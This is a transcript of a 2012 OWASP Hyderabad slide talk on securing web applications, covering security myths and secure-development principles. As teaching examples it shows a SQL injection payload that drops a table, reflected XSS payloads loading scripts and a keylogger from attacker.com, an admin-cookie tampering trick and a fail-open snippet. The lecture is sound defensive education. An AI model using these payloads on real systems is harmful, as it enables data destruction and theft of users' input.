how to secure web applications
DESCRIPTION
I presented this presentation at owasp hyderabad oct 2012 meet. you can find more details at https://www.owasp.org/index.php/HyderabadTRANSCRIPT
![Page 1: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/1.jpg)
The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards“
”- Gene Spafford
![Page 2: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/2.jpg)
SECURING WEB APPLICATIONS
ofA BIRD'S EYE VIEW
![Page 3: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/3.jpg)
Hello Everyone
![Page 4: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/4.jpg)
# Security Researcher # Null Hyd Moderator # OWASP Hyd Board Member @imran_naseem
Imran Mohammed
![Page 5: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/5.jpg)
Do you know ?
![Page 6: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/6.jpg)
90% of companiesgot hacked last year
http://www.computerworld.com/s/article/9217853/90_of_companies_say_they_ve_been_hacked_Survey
![Page 7: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/7.jpg)
To name few ...
![Page 8: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/8.jpg)
got hacked twice60%
![Page 9: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/9.jpg)
50% are unsure about this year
![Page 10: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/10.jpg)
Myths of App Sec
![Page 11: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/11.jpg)
Myth #1
We have network firewall & WAF
![Page 12: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/12.jpg)
Myth #2
We have SSL hence we are secure
![Page 13: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/13.jpg)
Myth #3
Testing team will handle security
![Page 14: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/14.jpg)
Myth #4
Nobody will attack us, we are a small organization
![Page 15: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/15.jpg)
![Page 16: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/16.jpg)
If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology“
”- Bruce Schneier
![Page 17: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/17.jpg)
![Page 18: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/18.jpg)
Ten commandments of secure development
![Page 19: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/19.jpg)
Input is evil, validate it
Validate input source, context, syntax and semantics of data, current and previous states
![Page 20: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/20.jpg)
SQL Injection
Front-end: https://bookstore.com/index.php?authorname=James
Back-end: SELECT title,year FROM books WHERE author = ‘James’
![Page 21: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/21.jpg)
SQL Injection
Front-end: https://bookstore.com/index.php?authorname=James’; drop table books;––
Back-end: SELECT title,year FROM books WHERE author = 'James’; drop table books;–– '
![Page 22: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/22.jpg)
Cross Site ScriptingFunctionality:
https://example.com/error.php?message=Sorry%2c+an +error+occurred
“Reflected” back to the client via webserver:
<p>Sorry, an error occurred.</p>
Any Problem ?
https://example.com/error.php?message=[can i change this ?]
![Page 23: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/23.jpg)
Cross Site ScriptingAttack Users:
https://example.com/error.php?message=<script src=”attacker.com/malicious.js”></script>
“Reflected” back to the client via webserver: <p><script src=”attacker.com/malicious.js”></script>.</p>
More problems
https://example.com/error.php?message=
<script src=”attacker.com/keylogger.js”></script>
https://example.com/error.php?message=
<script>document.location.href=”badsite.com”</script>
![Page 24: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/24.jpg)
POST /books/user1/search.asp HTTP/1.1
Accept: image/gif, image/xxbitmap, image/jpeg, image/pjpeg, application/xshockwaveflash, application/vnd.msexcel,
Accept-Language: en-gb,en-us;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Cookie: PHPSESSIONID=24c9e15e52afc47c225b757e7bee1f9d
Host: www.example.com
q=sqli
hidden_field=20
Check this
Check this
Check this
Check this
![Page 25: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/25.jpg)
Use cryptographically strong algorithms
![Page 26: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/26.jpg)
Cookie: lang=english; sessionid=aW1yYW4=
Cookie: lang=english; sessionid=cmFnaHU=
Base 64 is not encryption
![Page 27: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/27.jpg)
http://www.example.com/salary/view/8635f8ebae3017a5581dbeba572eb01a
MD5 is not good enough
Google it
![Page 28: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/28.jpg)
Use SHA2 or better with salt
![Page 29: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/29.jpg)
Minimize attack surface
![Page 30: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/30.jpg)
Use Least privilege
![Page 31: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/31.jpg)
Keep security simple
Keep design as simple and small as possible. Complex design is difficult to understand and secure.
![Page 32: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/32.jpg)
Provide Defense in depth
![Page 33: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/33.jpg)
![Page 34: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/34.jpg)
![Page 35: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/35.jpg)
![Page 36: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/36.jpg)
Fail safelyisAdmin = true;
try {
codeWhichMayFail();
isAdmin = isUserInRole( “Administrator” );
}
catch (Exception ex) {
log.write(ex.toString());
}
![Page 37: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/37.jpg)
Avoid Security through obscurity
![Page 38: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/38.jpg)
Cookie: lang=english; ADMIN=no; sessionid=yj3735mmhdABC
Cookie: lang=english; ADMIN=yes; sessionid=yj3735mmhdABC
![Page 39: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/39.jpg)
Fix Security issues correctly
![Page 40: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/40.jpg)
Use Secure defaults
Remember scott/tiger ?
andAdmin/password ( router's admin panel )
![Page 41: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/41.jpg)
Dont reinvent the wheeel
![Page 42: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/42.jpg)
How to do develop/fix the code securely ?
![Page 43: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/43.jpg)
Follow Secure SDLC
![Page 44: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/44.jpg)
OWASP Development Guide
![Page 45: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/45.jpg)
Educate Developers/Users
![Page 46: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/46.jpg)
Use OWASP ESAPI
![Page 47: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/47.jpg)
![Page 48: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/48.jpg)
Typical OWASP ESAPI Example
![Page 49: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/49.jpg)
Thanks !
![Page 50: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/50.jpg)
Questions ?
![Page 51: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/51.jpg)
CreditsAll icons are taken from the noun project
OWASP Project related Images are taken from owasp.org